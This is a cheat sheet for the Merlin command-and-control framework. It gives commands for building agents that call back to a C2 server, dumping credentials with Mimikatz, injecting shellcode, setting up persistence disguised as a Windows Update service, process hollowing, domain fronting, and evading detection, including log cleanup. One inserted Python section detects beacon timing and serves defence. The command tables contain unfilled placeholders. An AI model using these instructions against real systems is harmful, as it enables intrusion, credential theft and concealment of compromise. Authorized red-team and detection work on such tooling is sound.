
Merlin C2 Framework Cheat Sheet


Overview

Merlin is a cross-platform post-exploitation HTTP/2 command and control server and agent written in Golang. It uses HTTP/2 for communication and offers modern protocol evasion capabilities with built-in data jitter and encryption.

Warning: This tool is intended only for authorized penetration testing and red team exercises. Make sure you have proper authorization before using it in any environment.

Installation

Pre-compiled Binaries

```bash
# Download latest release for Linux
wget https://github.com/Ne0nd0g/merlin/releases/latest/download/merlinServer-Linux-x64.7z
7z x merlinServer-Linux-x64.7z

# Download latest release for Windows
# Download merlinServer-Windows-x64.7z from GitHub releases

# Download latest release for macOS
wget https://github.com/Ne0nd0g/merlin/releases/latest/download/merlinServer-Darwin-x64.7z
7z x merlinServer-Darwin-x64.7z
```

Build from Source

```bash
# Install Go (version 1.19+)
git clone https://github.com/Ne0nd0g/merlin.git
cd merlin
make build-server
make build-agent
```

Docker Installation

```bash
# Pull official Docker image
docker pull ne0nd0g/merlin

# Run Merlin server in Docker
docker run -it -p 443:443 ne0nd0g/merlin
```

Basic Usage

Starting the Merlin Server

```bash
# Start server with default settings
./merlinServer-Linux-x64

# Start server with custom interface
./merlinServer-Linux-x64 -i 0.0.0.0

# Start server with custom port
./merlinServer-Linux-x64 -p 8443

# Start server with custom certificate
./merlinServer-Linux-x64 -crt /path/to/cert.crt -key /path/to/key.key
```

Agent Generation

```bash
# Generate Windows agent
make build-agent-windows

# Generate Linux agent
make build-agent-linux

# Generate macOS agent
make build-agent-darwin
```

Command Reference

Server Management

| Command | Description |
|---------|-------------|
| INLINE_CODE_31 | Display help menu |
| INLINE_CODE_32 | Show version information |
| INLINE_CODE_33 | List active listeners |
| INLINE_CODE_34 | List connected agents |
| INLINE_CODE_35 | Show active sessions |
| INLINE_CODE_36 | Exit Merlin server |

Listener Management

| Command | Description |
|---------|-------------|
| INLINE_CODE_37 | List all listeners |
| INLINE_CODE_38 | Select listener type |
| INLINE_CODE_39 | Set listener option |
| INLINE_CODE_40 | Start the listener |
| INLINE_CODE_41 | Stop the listener |
| INLINE_CODE_42 | Show listener information |

Agent Interaction

Listener Configuration

HTTP/2 Listener

```bash
# Use HTTP/2 listener
use listener http2

# Configure listener options
set Interface 0.0.0.0
set Port 443
set Certificate /path/to/cert.crt
set Key /path/to/key.key

# Start listener
start
```

HTTP/3 Listener (QUIC)

```bash
# Use HTTP/3 listener
use listener http3

# Configure QUIC options
set Interface 0.0.0.0
set Port 443
set Certificate /path/to/cert.crt
set Key /path/to/key.key

# Start listener
start
```

TCP Listener

```bash
# Use TCP listener
use listener tcp

# Configure TCP options
set Interface 0.0.0.0
set Port 4444

# Start listener
start
```

SMB Listener

```bash
# Use SMB listener (Windows)
use listener smb

# Configure SMB options
set Interface 0.0.0.0
set Port 445

# Start listener
start
```

Agent Configuration

HTTP/2 Agent

```bash
# Build HTTP/2 agent
GOOS=windows GOARCH=amd64 go build -ldflags "-X main.url=https://192.168.1.100:443" -o agent.exe cmd/merlinagent/main.go

# Build with custom options
GOOS=linux GOARCH=amd64 go build -ldflags "-X main.url=https://192.168.1.100:443 -X main.sleep=30s -X main.jitter=0.2" -o agent cmd/merlinagent/main.go
```

Agent Options

```bash
# Set communication URL
-X main.url=https://server.com:443

# Set sleep interval
-X main.sleep=30s

# Set jitter percentage
-X main.jitter=0.2

# Set maximum retries
-X main.maxretry=7

# Set user agent
-X main.useragent="Mozilla/5.0 (Windows NT 10.0; Win64; x64)"

# Set proxy
-X main.proxy=http://proxy.com:8080
```
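
For defenders, the sleep and jitter options above bound how regular an agent's check-ins are, and that regularity shows up in flow logs. The following is an added example (not part of the original cheat sheet or the Merlin project) that flags source/destination pairs with periodic connections; the record layout, the thresholds, and the reading of jitter as a fraction of the sleep interval are assumptions.

```python
from collections import defaultdict
from statistics import median

# Constructed sample flow records: (epoch_seconds, source_host, destination).
# 10.0.0.5 imitates check-ins with sleep=30s and jitter=0.2 (gaps of 24-36 s),
# 10.0.0.7 is bursty interactive browsing, 10.0.0.9 has too few connections.
FLOWS = (
    [(t, "10.0.0.5", "203.0.113.10:443") for t in (0, 31, 58, 92, 119, 150, 176, 209, 240)]
    + [(t, "10.0.0.7", "198.51.100.20:443") for t in (0, 2, 3, 45, 47, 300, 301, 302, 900)]
    + [(t, "10.0.0.9", "192.0.2.44:443") for t in (0, 30, 60)]
)


def beacon_candidates(flows, max_jitter=0.25, min_events=6, min_fraction=0.9):
    """Return {(src, dst): (median_gap, fraction_in_band)} for periodic pairs.

    A pair is a candidate when at least min_fraction of its inter-connection
    gaps fall inside median_gap * (1 +/- max_jitter). Thresholds are
    assumptions to tune against local baseline traffic.
    """
    times = defaultdict(list)
    for ts, src, dst in flows:
        times[(src, dst)].append(ts)

    hits = {}
    for pair, stamps in times.items():
        if len(stamps) < min_events:
            continue  # too few connections to judge periodicity
        stamps.sort()
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        mid = median(gaps)
        if mid <= 0:
            continue  # all connections in the same second, no usable period
        lo, hi = mid * (1 - max_jitter), mid * (1 + max_jitter)
        fraction = sum(lo <= g <= hi for g in gaps) / len(gaps)
        if fraction >= min_fraction:
            hits[pair] = (mid, fraction)
    return hits


if __name__ == "__main__":
    for (src, dst), (mid, frac) in beacon_candidates(FLOWS).items():
        print(f"{src} -> {dst}: median gap {mid}s, {frac:.0%} of gaps in band")
```

Setting `max_jitter` slightly above the jitter value expected from a build keeps the band tolerant of network delay; long-lived HTTP/2 connections may need request-level rather than connection-level timestamps.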

Post-Exploitation Commands

System Information

```bash
# Get system information
sysinfo

# Get current user
whoami

# Get environment variables
env

# Get network interfaces
ifconfig

# Get running processes
ps
```

File Operations

```bash
# List directory contents
ls /path/to/directory

# Change directory
cd /path/to/directory

# Create directory
mkdir /path/to/new/directory

# Remove file
rm /path/to/file

# Copy file
cp /source/file /destination/file

# Move file
mv /source/file /destination/file
```

Network Operations

```bash
# Network connections
netstat

# ARP table
arp

# Routing table
route

# DNS lookup
nslookup domain.com

# Ping host
ping 192.168.1.1
```

Process Management

```bash
# List processes
ps

# Kill process
kill

# Start process
execute

# Get process information
info
```

Advanced Features

Module System

```bash
# List available modules
modules

# Use module
use module

# Set module options
set

# Run module
run

# Show module info
info
```

Built-in Modules

```bash
# Mimikatz module
use module mimikatz
set Command sekurlsa::logonpasswords
run

# PowerShell module
use module powershell
set Command Get-Process
run

# Assembly execution
use module executeassembly
set Assembly /path/to/assembly.exe
set Arguments "arg1 arg2"
run
```

Shellcode Execution

```bash
# Execute shellcode
use module shellcode
set Shellcode
run

# Shellcode injection
use module shinject
set PID
set Shellcode
run
```

Persistence

```bash
# Registry persistence
use module persistence
set Method registry
set Key "HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
set Value "Update"
set Data "C:\temp\agent.exe"
run

# Service persistence
use module service
set Name "UpdateService"
set DisplayName "Windows Update Service"
set BinaryPath "C:\temp\agent.exe"
run
```

Evasion Techniques

Traffic Obfuscation

```bash
# Custom User-Agent
-X main.useragent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"

# Custom headers
-X main.headers="X-Custom-Header:value"

# Domain fronting
-X main.url=https://cdn.example.com -X main.host=legitimate-site.com
```

Payload Obfuscation

```bash
# Build with custom build tags
go build -tags="debug" -ldflags "-s -w" -o agent.exe

# Use UPX packing
upx --best agent.exe

# Custom encryption
-X main.psk=your-pre-shared-key
```

Anti-Analysis

```bash
# VM detection
use module vmdetect
run

# Sandbox evasion
use module sleep
set Duration 60
run

# Process hollowing
use module hollow
set Target notepad.exe
set Payload
run
```

Certificate Management

Generate a Self-Signed Certificate

```bash
# Generate certificate and key
openssl req -new -x509 -keyout server.key -out server.crt -days 365 -nodes

# Generate with SAN: the subject is passed with -subj and the [SAN]
# section of the inline config is selected with -extensions
openssl req -new -x509 -keyout server.key -out server.crt -days 365 -nodes \
  -subj "/CN=server.com" -extensions SAN -config <(
    echo '[req]'
    echo 'distinguished_name = req'
    echo '[SAN]'
    echo 'subjectAltName = DNS:server.com,DNS:*.server.com,IP:192.168.1.100'
  )
```

Let's Encrypt Certificate

```bash
# Install certbot
sudo apt install certbot

# Generate certificate
certbot certonly --standalone -d yourdomain.com

# Use certificate with Merlin
./merlinServer-Linux-x64 -crt /etc/letsencrypt/live/yourdomain.com/fullchain.pem -key /etc/letsencrypt/live/yourdomain.com/privkey.pem
```

Operational Procedures

Infrastructure Setup

```nginx
# Use redirectors
# Set up nginx reverse proxy
server {
    listen 443 ssl http2;
    server_name legitimate-site.com;

    ssl_certificate /path/to/cert.crt;
    ssl_certificate_key /path/to/key.key;

    location / {
        proxy_pass https://merlin-server:443;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
    }
}
```

Team Operations

```bash
# Multi-operator setup
# Use shared database or file system
# Implement proper access controls
# Use separate operator certificates
```

Logging and Monitoring

```bash
# Enable detailed logging
./merlinServer-Linux-x64 -debug

# Monitor connections
tail -f merlin.log

# Network monitoring
tcpdump -i any -w merlin_traffic.pcap port 443
```

Troubleshooting

Connection Issues

```bash
# Check listener status
listeners

# Test connectivity
curl -k https://server.com:443

# Check certificate
openssl s_client -connect server.com:443 -servername server.com
```

Agent Issues

```bash
# Debug agent connection
# Build agent with debug flags
go build -ldflags "-X main.debug=true" -o agent-debug.exe

# Check agent logs
# Enable verbose output in agent
```

Performance Issues

```bash
# Adjust sleep and jitter
-X main.sleep=10s -X main.jitter=0.1

# Optimize HTTP/2 settings
# Increase connection limits
# Use connection pooling
```

Certificate Issues

```bash
# Verify certificate
openssl x509 -in server.crt -text -noout

# Check certificate chain
openssl verify -CAfile ca.crt server.crt

# Test SSL configuration
sslscan server.com:443
```

Detection Evasion

Network Level

  • Use legitimate certificates and domains
  • Implement proper HTTP/2 configuration
  • Vary communication patterns and timing
  • Use domain fronting techniques
  • Implement proper error handling

Host Level

  • Use legitimate process names and paths
  • Implement anti-VM and sandbox detection
  • Use process hollowing and injection
  • Encrypt payloads and communications
  • Clean up artifacts and logs

Behavioral

  • Limit resource usage and network activity
  • Use legitimate user agents and headers
  • Implement proper sleep and jitter
  • Avoid suspicious API calls
  • Use living-off-the-land techniques

Resources

--

*This cheat sheet provides a comprehensive reference for using the Merlin C2 Framework. Always make sure you have proper authorization before using this tool in any environment.*